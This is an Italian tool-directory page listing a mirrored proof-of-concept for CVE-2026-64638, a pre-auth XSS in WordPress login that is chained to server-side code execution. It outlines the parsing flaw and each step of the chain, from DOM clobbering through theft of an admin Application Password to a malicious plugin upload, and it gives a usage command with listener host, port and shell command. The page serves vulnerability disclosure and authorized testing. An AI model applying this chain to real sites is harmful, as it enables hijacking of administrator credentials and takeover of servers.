Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-64638 — XSS2Shell (CVE-2026-64638) mirror PoC di XSS pre-auth a RCE in WordPress — WordSec, MIT; per test di sicurezza autorizzati | Kitploit
Strumenti/GitHubGitHub/hackspeak/cve-2026-64638
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingAttacco Avversario
GitHubhackspeak/cve-2026-64638

CVE-2026-64638

XSS2Shell (CVE-2026-64638) mirror PoC di XSS pre-auth a RCE in WordPress — WordSec, MIT; per test di sicurezza autorizzati

Vedi Repository
151 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-64638 — XSS2Shell: XSS pre-autenticazione nella pagina di login di WordPress → RCE sul server

Mirror di distribuzione HackSpeak. Questo repository è un mirror distributivo del PoC didattico XSS2Shell (CVE-2026-64638) pubblicato da WordSec, con codice identico all'upstream; l'upstream è MIT License, Copyright (c) 2026 WordSec.

⚠️ Esclusivamente per ricerca sulla sicurezza e test autorizzati: eseguire solo su siti WordPress di propria proprietà o con autorizzazione scritta di valutazione; il PoC genera e pulisce artefatti di pubblicazione temporanei, non utilizzarlo contro amministratori terzi o sistemi di produzione.

Riepilogo della vulnerabilità

XSS2Shell (CVE-2026-64638) è una XSS riflessa pre-autenticazione nella pagina di login di WordPress (wp-login.php), che può essere elevata, tramite una catena completa, a esecuzione di codice PHP lato server (RCE).

  • Causa principale: divergenza di parsing tra strip_tags() di PHP e KSES di WordPress (wp_kses_post()) — inserendo uno spazio tra < e il nome del tag (es. ), la prima lo conserva come testo normale, mentre la seconda lo interpreta come elemento HTML valido (// sono tutti nella whitelist);
< area
<area>
<div>
<button>
  • XSS: senza autenticazione, l'invio di un nome utente artefatto lo innesca nella pagina di errore di login fallito;
  • Catena RCE: DOM Clobbering per dirottare ajaxurl → user-profile.js incluso nella pagina di login innesca automaticamente una POST jQuery → REST API JSONP (_jsonp) → Same Origin Method Execution (SOME, Paulos Yibelo 2022) → click cross-window sul pulsante di autorizzazione Application Password dell'amministratore → furto delle credenziali API → pubblicazione di una pagina contenente <script> → upload di un plugin ZIP dannoso → esecuzione diretta di PHP (senza attivazione);
  • Impatto: quasi tutte le versioni di WordPress (4.9.0–7.0.2); correzione nella 7.0.3 (2026-08-06, urgente), backportata a tutti i branch di manutenzione dalla 4.7 in poi.
  • Utilizzo

    root@kitploit:~
    python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
    
    ParametroDescrizione
    -t, --targetURL di base di WordPress (include http/https, normalizzazione automatica dello slash finale)
    -c, --commandComando da eseguire quando la shell è pronta
    --lhost / --lportIndirizzo/porta di ascolto (lport 0 = casuale)
    --keepConserva la pagina di pubblicazione temporanea (default: pulizia)

    Dipendenze: Python 3.7+, zero pacchetti di terze parti; richiede che un amministratore acceda al sito target e apra l'URL dell'attaccante (una singola interazione).

    Dichiarazione di non responsabilità

    • Solo a scopo di ricerca sulla sicurezza, verifica delle vulnerabilità e test difensivi; eseguire in un ambiente distruttibile, non usare su sistemi non autorizzati.
    • Il PoC è codice a scopo didattico, basato su analisi tecniche pubbliche; prima dell'uso leggere la documentazione upstream e i confini di autorizzazione del target.

    Link di riferimento

    • Repository sorgente upstream (origine di questo PoC): https://github.com/wordsec/XSS2Shell
    • Divulgazione ufficiale pwn.ai: XSS2Shell — https://pwn.ai/blog/xss2shell
    • Avviso di sicurezza ufficiale WordPress: GHSA-52p2-r8wf-jcrf — https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-52p2-r8wf-jcrf
    • Annuncio di rilascio di WordPress 7.0.3: https://wordpress.org/news/2026/08/wordpress-7-0-3-release/
    • Articolo di The Hacker News: https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
    • Analisi tecnica WordSec + spiegazione del PoC: https://wordsec.net/blog/xss2shell-wordpress-pre-auth-xss-to-rce-cve-2026-64638
    Scarica lo strumento